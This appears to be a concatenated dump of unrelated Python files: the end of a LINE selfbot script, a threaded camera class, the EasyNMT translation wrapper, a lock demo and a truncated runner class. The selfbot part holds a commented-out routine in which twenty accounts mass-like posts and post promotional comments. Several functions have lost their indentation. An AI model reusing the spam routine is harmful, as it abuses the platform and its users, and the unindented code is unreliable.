# ki7.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki7.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki8.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki8.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki9.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki9.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki10.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki10.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki11.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki11.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki12.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki12.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki13.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki13.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~cybertk\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki14.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki14.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki15.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki15.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki16.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki16.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki17.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki17.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki18.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki18.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki19.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki19.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki20.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki20.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# print "Like"
# print "Like"
# print "Like"
# except:
# pass
# else:
# print "Already Liked"
# time.sleep(600)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
# Main long-polling loop: repeatedly fetch pending operations from the
# LINE server and dispatch each one to the bot() handler.
while True:
    try:
        # Fetch up to 5 operations newer than the current revision cursor.
        Ops = cl.fetchOps(cl.Poll.rev, 5)
    except EOFError:
        # The server closed the stream; usually means the stored revision
        # number is stale/invalid.
        raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
    for Op in Ops:
        if (Op.type != OpType.END_OF_OPERATION):
            # Advance the revision cursor so already-handled operations are
            # not fetched again, then dispatch to the handler.
            cl.Poll.rev = max(cl.Poll.rev, Op.revision)
            bot(Op)
|
base_camera.py | import time
import threading
import os
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
    """An Event-like class that signals all active clients when a new frame is
    available.

    Each client thread gets its own ``threading.Event`` keyed by its thread
    identifier; ``set()`` wakes every waiting client and prunes clients that
    stopped consuming frames.
    """

    def __init__(self):
        # Maps thread ident -> [threading.Event, timestamp of last set()].
        self.events = {}

    def wait(self):
        """Invoked from each client's thread to wait for the next frame."""
        ident = get_ident()
        if ident not in self.events:
            # This is a new client: register an entry for it.  Each entry has
            # two elements, a threading.Event() and a timestamp.
            self.events[ident] = [threading.Event(), time.time()]
        return self.events[ident][0].wait()

    def set(self):
        """Invoked by the camera thread when a new frame is available."""
        now = time.time()
        stale = []
        for ident, event in self.events.items():
            # is_set(): the camelCase isSet() alias was deprecated in 3.10
            # and removed in Python 3.12.
            if not event[0].is_set():
                # Client is waiting for a frame: wake it and record when.
                event[0].set()
                event[1] = now
            else:
                # The event is still set, so the client never processed the
                # previous frame.  If it stays set for more than 5 seconds,
                # assume the client is gone and drop it.  Collect ALL stale
                # clients (the original kept only the last one seen, leaking
                # the rest).
                if now - event[1] > 5:
                    stale.append(ident)
        for ident in stale:
            del self.events[ident]

    def clear(self):
        """Invoked from each client's thread after a frame was processed."""
        self.events[get_ident()][0].clear()
class BaseCamera(object):
    """Base class managing a single shared background capture thread.

    All state is class-level: every BaseCamera instance shares one capture
    thread, one current frame, and one CameraEvent used to fan frames out
    to client threads.
    """
    thread = None  # background thread that reads frames from camera
    frame = None  # current frame is stored here by background thread
    last_access = 0  # time of last client access to the camera
    event = CameraEvent()

    def __init__(self):
        """Start the background camera thread if it isn't running yet."""
        if BaseCamera.thread is None:
            BaseCamera.last_access = time.time()
            # start background frame thread
            BaseCamera.thread = threading.Thread(target=self._thread)
            BaseCamera.thread.start()
            # wait until frames are available (busy-yield, not busy-spin)
            while self.get_frame() is None:
                time.sleep(0)

    def get_frame(self):
        """Return the current camera frame (blocks until one is signalled)."""
        BaseCamera.last_access = time.time()
        # wait for a signal from the camera thread
        BaseCamera.event.wait()
        BaseCamera.event.clear()
        return BaseCamera.frame

    @staticmethod
    def frames():
        """Generator that yields frames from the camera; must be overridden."""
        raise RuntimeError('Must be implemented by subclasses.')

    @classmethod
    def _thread(cls):
        """Camera background thread: pull frames and signal all clients."""
        print('Starting camera thread.')
        frames_iterator = cls.frames()
        for frame in frames_iterator:
            BaseCamera.frame = frame
            BaseCamera.event.set()  # send signal to clients
            time.sleep(0)
            # if there hasn't been any clients asking for frames in
            # the last 10 seconds then stop the thread
            if time.time() - BaseCamera.last_access > 10:
                frames_iterator.close()
                # adding servo pwm stop command: https://github.com/richardghirst/PiBits/tree/master/ServoBlaster
                # NOTE(review): writes to the ServoBlaster device to de-energise
                # the servos — only meaningful on a Raspberry Pi with the
                # servoblaster driver loaded.
                os.system("echo 2=0 > /dev/servoblaster")  # 2 is raspberry pi gpio pin # 18
                os.system("echo 6=0 > /dev/servoblaster")  # 6 is raspberry pi gpio pin # 24
                print('Stopping camera thread and servos due to inactivity.')
                break
        # Allow a future BaseCamera() to restart the capture thread.
        BaseCamera.thread = None
|
EasyNMT.py | import os
import torch
from .util import http_get, import_from_string
import json
from . import __DOWNLOAD_SERVER__
from typing import List, Union, Dict, FrozenSet, Set, Iterable
import numpy as np
import tqdm
import nltk
import torch.multiprocessing as mp
import queue
import math
import re
import logging
import time
logger = logging.getLogger(__name__)
class EasyNMT:
def __init__(self, model_name: str, cache_folder: str = None, translator=None, load_translator: bool = True, device=None, max_length: int = None, **kwargs):
    """
    Easy-to-use, state-of-the-art machine translation
    :param model_name: Model name (see Readme for available models)
    :param cache_folder: Which folder should be used for caching models. Can also be set via the EASYNMT_CACHE env. variable
    :param translator: Translator object. Set to None, to automatically load the model via the model name.
    :param load_translator: If set to false, it will only load the config but not the translation engine
    :param device: CPU / GPU device for PyTorch
    :param max_length: Max number of token per sentence for translation. Longer text will be truncated
    :param kwargs: Further optional parameters for the different models
    """
    self._fasttext_lang_id = None
    # Preference order used by language_detection(): fastText, langid, langdetect.
    self._lang_detectors = [self.language_detection_fasttext, self.language_detection_langid, self.language_detection_langdetect]
    if device is None:
        device = 'cuda' if torch.cuda.is_available() else 'cpu'
    self.device = device
    self.config = None
    if cache_folder is None:
        if 'EASYNMT_CACHE' in os.environ:
            cache_folder = os.environ['EASYNMT_CACHE']
        else:
            # Default: a subfolder of the torch hub cache directory.
            cache_folder = os.path.join(torch.hub._get_torch_home(), 'easynmt')
    self._cache_folder = cache_folder
    if translator is not None:
        # Caller supplied a ready translation engine; use it as-is.
        self.translator = translator
    else:
        if os.path.exists(model_name) and os.path.isdir(model_name):
            # model_name is a local directory containing the model files.
            model_path = model_name
        else:
            model_name = model_name.lower()
            model_path = os.path.join(cache_folder, model_name)
            if not os.path.exists(model_path) or not os.listdir(model_path):
                logger.info("Downloading EasyNMT model {} and saving it at {}".format(model_name, model_path))
                # Download into a "<path>_part" folder first so a partial
                # download never looks like a complete cached model.
                model_path_tmp = model_path.rstrip("/").rstrip("\\") + "_part"
                os.makedirs(model_path_tmp, exist_ok=True)
                #Download easynmt.json
                config_url = __DOWNLOAD_SERVER__+"/{}/easynmt.json".format(model_name)
                config_path = os.path.join(model_path_tmp, 'easynmt.json')
                http_get(config_url, config_path)
                with open(config_path) as fIn:
                    downloaded_config = json.load(fIn)
                if 'files' in downloaded_config:
                    for filename, url in downloaded_config['files'].items():
                        logger.info("Download {} from {}".format(filename, url))
                        http_get(url, os.path.join(model_path_tmp, filename))
                ##Rename tmp path
                os.rename(model_path_tmp, model_path)
        with open(os.path.join(model_path, 'easynmt.json')) as fIn:
            self.config = json.load(fIn)
        self._lang_pairs = frozenset(self.config['lang_pairs'])
        if load_translator:
            # The config names the engine class; import and instantiate it.
            module_class = import_from_string(self.config['model_class'])
            self.translator = module_class(model_path, **kwargs)
            # NOTE(review): indentation was lost in this copy; upstream EasyNMT
            # sets max_length immediately after constructing the translator —
            # confirm against the original file.
            self.translator.max_length = max_length
def translate(self, documents: Union[str, List[str]], target_lang: str, source_lang: str = None,
              show_progress_bar: bool = False, beam_size: int = 5, batch_size: int = 16,
              perform_sentence_splitting: bool = True, paragraph_split: str = "\n", sentence_splitter=None, document_language_detection: bool = True,
              **kwargs):
    """
    This method translates the given set of documents
    :param documents: If documents is a string, returns the translated document as string. If documents is a list of strings, translates all documents and returns a list.
    :param target_lang: Target language for the translation
    :param source_lang: Source language for all documents. If None, determines the source languages automatically.
    :param show_progress_bar: If true, plot a progress bar on the progress for the translation
    :param beam_size: Size for beam search
    :param batch_size: Number of sentences to translate at the same time
    :param perform_sentence_splitting: Longer documents are broken down sentences, which are translated individually
    :param paragraph_split: Split symbol for paragraphs. No sentences can go across the paragraph_split symbol.
    :param sentence_splitter: Method used to split sentences. If None, uses the default self.sentence_splitting method
    :param document_language_detection: Perform language detection on document level
    :param kwargs: Optional arguments for the translator model
    :return: Returns a string or a list of string with the translated documents
    """
    #Method_args will store all passed arguments to method
    # (captured so per-language recursive calls below reuse identical options)
    method_args = locals()
    del method_args['self']
    del method_args['kwargs']
    method_args.update(kwargs)
    if source_lang == target_lang:
        # Nothing to do — return the input unchanged.
        return documents
    is_single_doc = False
    if isinstance(documents, str):
        documents = [documents]
        is_single_doc = True
    if source_lang is None and document_language_detection:
        # Detect a language per document, then recurse once per language
        # with source_lang fixed, reassembling results in input order.
        src_langs = [self.language_detection(doc) for doc in documents]
        # Group by languages
        lang2id = {}
        for idx, lng in enumerate(src_langs):
            if lng not in lang2id:
                lang2id[lng] = []
            lang2id[lng].append(idx)
        # Translate language wise
        output = [None] * len(documents)
        for lng, ids in lang2id.items():
            logger.info("Translate documents of language: {}".format(lng))
            try:
                method_args['documents'] = [documents[idx] for idx in ids]
                method_args['source_lang'] = lng
                translated = self.translate(**method_args)
                for idx, translated_sentences in zip(ids, translated):
                    output[idx] = translated_sentences
            except Exception as e:
                logger.warning("Exception: "+str(e))
                raise e
        if is_single_doc and len(output) == 1:
            output = output[0]
        return output
    if perform_sentence_splitting:
        if sentence_splitter is None:
            sentence_splitter = self.sentence_splitting
        # Split document into sentences
        start_time = time.time()
        splitted_sentences = []
        sent2doc = []   # cumulative sentence count per document (end index)
        for doc in documents:
            paragraphs = doc.split(paragraph_split) if paragraph_split is not None else [doc]
            for para in paragraphs:
                for sent in sentence_splitter(para.strip(), source_lang):
                    sent = sent.strip()
                    if len(sent) > 0:
                        splitted_sentences.append(sent)
            sent2doc.append(len(splitted_sentences))
        #logger.info("Sentence splitting done after: {:.2f} sec".format(time.time() - start_time))
        #logger.info("Translate {} sentences".format(len(splitted_sentences)))
        translated_sentences = self.translate_sentences(splitted_sentences, target_lang=target_lang, source_lang=source_lang, show_progress_bar=show_progress_bar, beam_size=beam_size, batch_size=batch_size, **kwargs)
        # Merge sentences back to documents
        start_time = time.time()
        translated_docs = []
        for doc_idx in range(len(documents)):
            start_idx = sent2doc[doc_idx - 1] if doc_idx > 0 else 0
            end_idx = sent2doc[doc_idx]
            translated_docs.append(self._reconstruct_document(documents[doc_idx], splitted_sentences[start_idx:end_idx], translated_sentences[start_idx:end_idx]))
        #logger.info("Document reconstruction done after: {:.2f} sec".format(time.time() - start_time))
    else:
        # Treat each document as a single "sentence".
        translated_docs = self.translate_sentences(documents, target_lang=target_lang, source_lang=source_lang, show_progress_bar=show_progress_bar, beam_size=beam_size, batch_size=batch_size, **kwargs)
    if is_single_doc:
        translated_docs = translated_docs[0]
    return translated_docs
@staticmethod
def _reconstruct_document(doc, org_sent, translated_sent):
"""
This method reconstructs the translated document and
keeps white space in the beginning / at the end of sentences.
"""
sent_idx = 0
char_idx = 0
translated_doc = ""
while char_idx < len(doc):
if sent_idx < len(org_sent) and doc[char_idx] == org_sent[sent_idx][0]:
translated_doc += translated_sent[sent_idx]
char_idx += len(org_sent[sent_idx])
sent_idx += 1
else:
translated_doc += doc[char_idx]
char_idx += 1
return translated_doc
def translate_sentences(self, sentences: Union[str, List[str]], target_lang: str, source_lang: str = None,
                        show_progress_bar: bool = False, beam_size: int = 5, batch_size: int = 32, **kwargs):
    """
    This method translates individual sentences.
    :param sentences: A single sentence or a list of sentences to be translated
    :param source_lang: Source language for all sentences. If none, determines automatically the source language
    :param target_lang: Target language for the translation
    :param show_progress_bar: Show a progress bar
    :param beam_size: Size for beam search
    :param batch_size: Mini batch size
    :return: List of translated sentences
    """
    if source_lang == target_lang:
        return sentences
    is_single_sentence = False
    if isinstance(sentences, str):
        sentences = [sentences]
        is_single_sentence = True
    output = []
    if source_lang is None:
        #Determine languages for sentences
        src_langs = [self.language_detection(sent) for sent in sentences]
        logger.info("Detected languages: {}".format(set(src_langs)))
        #Group by languages
        lang2id = {}
        for idx, lng in enumerate(src_langs):
            if lng not in lang2id:
                lang2id[lng] = []
            lang2id[lng].append(idx)
        #Translate language wise, recursing once per detected language and
        #restoring results to their original positions.
        output = [None] * len(sentences)
        for lng, ids in lang2id.items():
            logger.info("Translate sentences of language: {}".format(lng))
            try:
                grouped_sentences = [sentences[idx] for idx in ids]
                translated = self.translate_sentences(grouped_sentences, source_lang=lng, target_lang=target_lang, show_progress_bar=show_progress_bar, beam_size=beam_size, batch_size=batch_size, **kwargs)
                for idx, translated_sentences in zip(ids, translated):
                    output[idx] = translated_sentences
            except Exception as e:
                logger.warning("Exception: "+str(e))
                raise e
    else:
        #Sort by length to speed up processing (batches of similar length
        #need less padding)
        length_sorted_idx = np.argsort([-len(sen) for sen in sentences])
        sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
        iterator = range(0, len(sentences_sorted), batch_size)
        if show_progress_bar:
            scale = min(batch_size, len(sentences))
            iterator = tqdm.tqdm(iterator, total=len(sentences)/scale, unit_scale=scale, smoothing=0)
        for start_idx in iterator:
            output.extend(self.translator.translate_sentences(sentences_sorted[start_idx:start_idx+batch_size], source_lang=source_lang, target_lang=target_lang, beam_size=beam_size, device=self.device, **kwargs))
        #Restore original sorting of sentences
        output = [output[idx] for idx in np.argsort(length_sorted_idx)]
    if is_single_sentence:
        output = output[0]
    return output
def start_multi_process_pool(self, target_devices: List[str] = None):
    """
    Starts multi process to process the encoding with several, independent processes.
    This method is recommended if you want to encode on multiple GPUs. It is advised
    to start only one process per GPU. This method works together with encode_multi_process
    :param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
    :return: Returns a dict with the target processes, an input queue and and output queue.
    """
    if target_devices is None:
        if torch.cuda.is_available():
            target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
        else:
            logger.info("CUDA is not available. Start 4 CPU worker")
            target_devices = ['cpu'] * 4
    logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
    # 'spawn' start method is required for CUDA to work in child processes.
    ctx = mp.get_context('spawn')
    input_queue = ctx.Queue()
    output_queue = ctx.Queue()
    processes = []
    for cuda_id in target_devices:
        # daemon=True so workers die with the parent process.
        p = ctx.Process(target=EasyNMT._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
        p.start()
        processes.append(p)
    return {'input': input_queue, 'output': output_queue, 'processes': processes}
def translate_multi_process(self, pool: Dict[str, object], documents: List[str], show_progress_bar: bool = True, chunk_size: int = None, **kwargs) -> List[str]:
    """
    This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
    and sent to individual processes, which encode these on the different GPUs. This method is only suitable
    for encoding large sets of sentences
    :param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
    :param chunk_size: Sentences are chunked and sent to the individual processes. If none, it determine a sensible size.
    :return: List of translated documents, in the same order as the input.
    """
    if chunk_size is None:
        # Aim for ~10 chunks per worker, capped at 1000 documents each.
        chunk_size = min(math.ceil(len(documents) / len(pool["processes"]) / 10), 1000)
    logger.info("Chunk data into packages of size {}".format(chunk_size))
    input_queue = pool['input']
    last_chunk_id = 0
    # Enqueue [chunk_id, docs, kwargs] work items for the workers.
    for start_idx in range(0, len(documents), chunk_size):
        input_queue.put([last_chunk_id, documents[start_idx:start_idx+chunk_size], kwargs])
        last_chunk_id += 1
    output_queue = pool['output']
    # Collect results (arriving in arbitrary order) and re-sort by chunk id.
    results_list = sorted([output_queue.get() for _ in tqdm.tqdm(range(last_chunk_id), total=last_chunk_id, unit_scale=chunk_size, smoothing=0, disable=not show_progress_bar)], key=lambda chunk: chunk[0])
    translated = []
    for chunk in results_list:
        translated.extend(chunk[1])
    return translated
def translate_stream(self, stream: Iterable[str], show_progress_bar: bool = True, chunk_size: int = 128, **kwargs) -> List[str]:
    """Lazily translate a stream of documents, yielding translations.

    Buffers ``chunk_size`` documents at a time, translates the batch, and
    yields the translated documents in input order.

    :param stream: Iterable of documents to translate (may be unbounded)
    :param show_progress_bar: Show a progress bar over the input stream
    :param chunk_size: Number of documents translated per batch
    :param kwargs: Passed through to :meth:`translate` (e.g. target_lang)
    """
    batch = []
    for doc in tqdm.tqdm(stream, smoothing=0.0, disable=not show_progress_bar):
        batch.append(doc)
        if len(batch) >= chunk_size:
            translated = self.translate(batch, show_progress_bar=False, **kwargs)
            for trans_doc in translated:
                yield trans_doc
            batch = []
    # Flush the final partial batch.  BUG FIX: the original checked
    # ``len(batch) >= chunk_size`` here, which can never be true after the
    # loop (the batch is flushed whenever it reaches chunk_size), so the
    # trailing documents were silently dropped.
    if len(batch) > 0:
        translated = self.translate(batch, show_progress_bar=False, **kwargs)
        for trans_doc in translated:
            yield trans_doc
@staticmethod
def stop_multi_process_pool(pool):
    """
    Stops all processes started with start_multi_process_pool
    :param pool: The dict returned by start_multi_process_pool
    """
    # Terminate first, then join+close, so no worker blocks the shutdown.
    for p in pool['processes']:
        p.terminate()
    for p in pool['processes']:
        p.join()
        p.close()
    pool['input'].close()
    pool['output'].close()
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
    """
    Internal working process to encode sentences in multi-process setup.
    Pulls [chunk_id, documents, kwargs] items from input_queue, translates
    them on target_device, and pushes [chunk_id, translated] to results_queue.
    """
    model.device = target_device
    while True:
        try:
            id, documents, kwargs = input_queue.get()
            translated = model.translate(documents, **kwargs)
            results_queue.put([id, translated])
        except queue.Empty:
            # NOTE(review): a blocking Queue.get() never raises queue.Empty,
            # so this break is effectively unreachable; the worker relies on
            # daemon=True / terminate() for shutdown instead — confirm intent.
            break
def language_detection(self, text: str) -> str:
"""
Given a text, detects the language code and returns the ISO language code.
It test different language detectors, based on what is available:
fastText, langid, langdetect.
You can change the language detector order by changing model._lang_detectors
:param text: Text for which we want to determine the language
:return: ISO language code
"""
for lang_detector in self._lang_detectors:
try:
return lang_detector(text)
except:
pass
raise Exception("No method for automatic language detection was found. Please install at least one of the following: fasttext (pip install fasttext), langid (pip install langid), or langdetect (pip install langdetect)")
def language_detection_fasttext(self, text: str) -> str:
    """
    Given a text, detects the language code and returns the ISO language code. It supports 176 languages. Uses
    the fasttext model for language detection:
    https://fasttext.cc/blog/2017/10/02/blog-post.html
    https://fasttext.cc/docs/en/language-identification.html
    The model file is downloaded into the cache folder on first use.
    """
    if self._fasttext_lang_id is None:
        import fasttext
        fasttext.FastText.eprint = lambda x: None   #Silence useless warning: https://github.com/facebookresearch/fastText/issues/1067
        model_path = os.path.join(self._cache_folder, 'lid.176.ftz')
        if not os.path.exists(model_path):
            http_get('https://dl.fbaipublicfiles.com/fasttext/supervised-models/lid.176.ftz', model_path)
        self._fasttext_lang_id = fasttext.load_model(model_path)
    # Flatten newlines to spaces (fastText expects single-line input); the
    # predicted label looks like "__label__en", so split off the prefix.
    return self._fasttext_lang_id.predict(text.lower().replace("\r\n", " ").replace("\n", " ").strip())[0][0].split('__')[-1]
def language_detection_langid(self, text: str) -> str:
    """Detect the ISO language code of *text* using the ``langid`` package."""
    import langid
    # Same newline-flattening preprocessing as the other detectors.
    return langid.classify(text.lower().replace("\r\n", " ").replace("\n", " ").strip())[0]
def language_detection_langdetect(self, text: str) -> str:
    """Detect the ISO language code of *text* using the ``langdetect`` package."""
    import langdetect
    # Same newline-flattening preprocessing as the other detectors.
    return langdetect.detect(text.lower().replace("\r\n", " ").replace("\n", " ").strip())
def sentence_splitting(self, text: str, lang: str = None):
    """Split *text* into sentences, using a language-appropriate splitter.

    Thai uses thai_segmenter; Arabic/Japanese/Korean/Chinese use a regex on
    sentence-final punctuation; everything else uses NLTK's punkt tokenizer
    (downloaded on first use).
    """
    if lang == 'th':
        from thai_segmenter import sentence_segment
        sentences = [str(sent) for sent in sentence_segment(text)]
    elif lang in ['ar', 'jp', 'ko', 'zh']:
        # Group runs of characters up to (and including) terminal punctuation.
        sentences = list(re.findall(u'[^!?。\.]+[!?。\.]*', text, flags=re.U))
    else:
        try:
            nltk.data.find('tokenizers/punkt')
        except LookupError:
            nltk.download('punkt')
        sentences = nltk.sent_tokenize(text)
    return sentences
@property
def lang_pairs(self) -> FrozenSet[str]:
    """
    Returns all allowed languages directions for the loaded model
    (frozenset of "src-tgt" strings, read from the model's easynmt.json
    config in __init__).
    """
    return self._lang_pairs
def get_languages(self, source_lang: str = None, target_lang: str = None) -> List[str]:
"""
Returns all available languages supported by the model
:param source_lang: If not None, then returns all languages to which we can translate for the given source_lang
:param target_lang: If not None, then returns all languages from which we can translate for the given target_lang
:return: Sorted list with the determined languages
"""
langs = set()
for lang_pair in self.lang_pairs:
source, target = lang_pair.split("-")
if source_lang is None and target_lang is None:
langs.add(source)
langs.add(target)
elif target_lang is not None and target == target_lang:
langs.add(source)
elif source_lang is not None and source == source_lang:
langs.add(target)
return sorted(list(langs))
|
do_lock.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time, threading
# Pretend this is your bank balance:
balance = 0
# Guards every modification of the shared `balance`.
lock = threading.Lock()
def change_it(n):
    # Deposit then withdraw the same amount; the net effect on the shared
    # balance should be 0 — but each statement is a non-atomic
    # read-modify-write, so callers must hold `lock` around this call.
    global balance
    balance = balance + n
    balance = balance - n
def run_thread(n):
    # Hammer the shared balance 100000 times so any race would be visible.
    for i in range(100000):
        # Acquire the lock first so the read-modify-write in change_it
        # cannot interleave with the other thread:
        lock.acquire()
        try:
            # Safe to mutate the shared balance now:
            change_it(n)
        finally:
            # Always release the lock, even if change_it raises:
            lock.release()
# Run two mutator threads concurrently; thanks to the lock the final
# balance is deterministically 0.
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
|
runner.py | import signal
import time
from threading import Thread
__all__ = ['Runner']
class Runner(object):
def __init__(self, conntracker, syncer, logger, **args):
self._conntracker = conntracker
self._syncer = syncer
self._logger = logger
self._args = args
self._done = False
self._handle_thread = None
self._sub_thread = None
def run(self):
self._start_threads()
try:
signal.signal(signal.SIGUSR1, self._conntracker.dump_state)
self._logger.info('entering sample loop '
'threshold={} top_n={} eval_interval={}'.format(
self._args['conn_threshold'],
self._args['top_n'],
self._args['eval_interval']))
self._run_sample_loop()
except KeyboardInterrupt:
self._logger.warn('interrupt')
finally:
signal.signal(signal.SIGUSR1, signal.SIG_IGN)
self._logger.info('cleaning up')
self._done = True
self._conntracker.sample(self._args['conn_threshold'],
self._args['top_n'])
self._conntracker.cleanup()
self._join()
def _run_sample_loop(self):
while True:
self._conntracker.sample(self._args['conn_threshold'],
self._args['top_n'])
nextloop = time.time() + self._args['eval_interval']
while time.time() < nextloop:
self._join()
if not self._is_alive():
self._done = True
return
if self._is_done():
return
time.sleep(0.1)
def _start_threads(self):
self._handle_thread = Thread(target=self._handle)
self._handle_thread.start()
self._sub_thread = Thread(target=self._sub)
self._sub_thread.daemon = True
self._sub_thread.start()
def _join(self):
self._handle_thread.join(0.1)
def _is_alive(self):
return self._handle_thread.is_alive()
